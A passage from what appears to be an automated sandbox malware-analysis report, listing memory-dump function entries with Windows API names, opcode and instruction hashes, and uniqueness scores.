                                                                                          • API ID: EncodePointer
                                                                                          • String ID:
                                                                                          • API String ID: 2118026453-0
                                                                                          • Opcode ID: be8b73ddf25dfe5eadf66d9dbb604a1994d04ea6f578b2932bb0405d087e24d0
                                                                                          • Instruction ID: 9c27d82b4a4f0c6346ee61e4ae51b31c6a40cd6f24a9e9d75b33b5255fe7a941
                                                                                          • Opcode Fuzzy Hash: be8b73ddf25dfe5eadf66d9dbb604a1994d04ea6f578b2932bb0405d087e24d0
                                                                                          • Instruction Fuzzy Hash: 43119775A013098FDB60EFAAD9487DEBBF4FB09718F20842AD508E3641C7796944CFA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00DF0AE9, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GlobalMemoryStatusEx.KERNELBASE ref: 00DF0B57
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499780379.0000000000DF0000.00000040.00000001.sdmp, Offset: 00DF0000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: GlobalMemoryStatus
                                                                                          • String ID:
                                                                                          • API String ID: 1890195054-0
                                                                                          • Opcode ID: 35ebdb841b365aeb55facf56f998f649bbab694516f56ab7fd4ebbb58d914500
                                                                                          • Instruction ID: 58e31c9b6c720b1fb68baf6e37fddebad0a8491ef11ddcbcaf048f3115e99fe9
                                                                                          • Opcode Fuzzy Hash: 35ebdb841b365aeb55facf56f998f649bbab694516f56ab7fd4ebbb58d914500
                                                                                          • Instruction Fuzzy Hash: 221130B1C0065ACFCB00CFAAC444BEEFBF4AF48324F14856AD918A7240D378A945CFA5
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00B55596, Relevance: 1.6, APIs: 1, Instructions: 51libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496139536.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 4bc3383ed78b9ecb0151d33f16f330a763ddd4713b490660f96bfc4194c057c6
                                                                                          • Instruction ID: fbb480d58485606a1493973d7bc1834e8fbad393e488d841d9060011508b7245
                                                                                          • Opcode Fuzzy Hash: 4bc3383ed78b9ecb0151d33f16f330a763ddd4713b490660f96bfc4194c057c6
                                                                                          • Instruction Fuzzy Hash: 45115B70A00648DFCB14DFB8D5A4B9DBBB2FF48306F2088A8D401AB294CB359846CF40
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00B9D450, Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496529150.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e0149c928ceb4a2c6f5bc65d9fe3bfd6219e1d9fcd6ffd0665db31bdef369472
                                                                                          • Instruction ID: 36fe0b728ec444f38f60403a63b11c72c1357c4bdad0a43d4e72e3af29e92676
                                                                                          • Opcode Fuzzy Hash: e0149c928ceb4a2c6f5bc65d9fe3bfd6219e1d9fcd6ffd0665db31bdef369472
                                                                                          • Instruction Fuzzy Hash: 4421F171504240DFDF04DF54D9C0B26BBA5FB98324F2489B9E9090B356C336E856DBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00BAD01C, Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496820004.0000000000BAD000.00000040.00000001.sdmp, Offset: 00BAD000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: deda4c6620b66428741af76a1306662ce120448df41e07b45c08b11d96ec9096
                                                                                          • Instruction ID: f8625c5366e3a9c5702449a4b235575e4fd72f638ddfab5b90ed19cdc0c0b036
                                                                                          • Opcode Fuzzy Hash: deda4c6620b66428741af76a1306662ce120448df41e07b45c08b11d96ec9096
                                                                                          • Instruction Fuzzy Hash: 1621F271508240DFDB24DF24D9D4B16BBA5FB89324F24C9ADE84A4B646C336D847CB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00BAD006, Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496820004.0000000000BAD000.00000040.00000001.sdmp, Offset: 00BAD000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 956dbd7af835c22af6e6fd023def9d6420c9894d7116dd1616d89366ed6b22a3
                                                                                          • Instruction ID: 736f09a2875548d9369b971a0455c2011cf09709fcdeb01b8637f43adee95dd1
                                                                                          • Opcode Fuzzy Hash: 956dbd7af835c22af6e6fd023def9d6420c9894d7116dd1616d89366ed6b22a3
                                                                                          • Instruction Fuzzy Hash: 352184755093808FCB12CF24D5A4B15BFB1EB46314F28C5DAD8498F697C33AD84ACB62
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00B9D44B, Relevance: .1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496529150.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a7d85455df3ea54cf3aba3b0efac5b37b78ef0d14b19c1e3f8f59425cab7dae7
                                                                                          • Instruction ID: 8a6fc2fb921f402439cf42d2c7074b9c814f79f41ee799484658e5f1ab8988b1
                                                                                          • Opcode Fuzzy Hash: a7d85455df3ea54cf3aba3b0efac5b37b78ef0d14b19c1e3f8f59425cab7dae7
                                                                                          • Instruction Fuzzy Hash: 6D11B176404280CFCF11CF14D5C4B16BFB1FB94324F24C6A9D9090B656C336D85ACBA1
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Non-executed Functions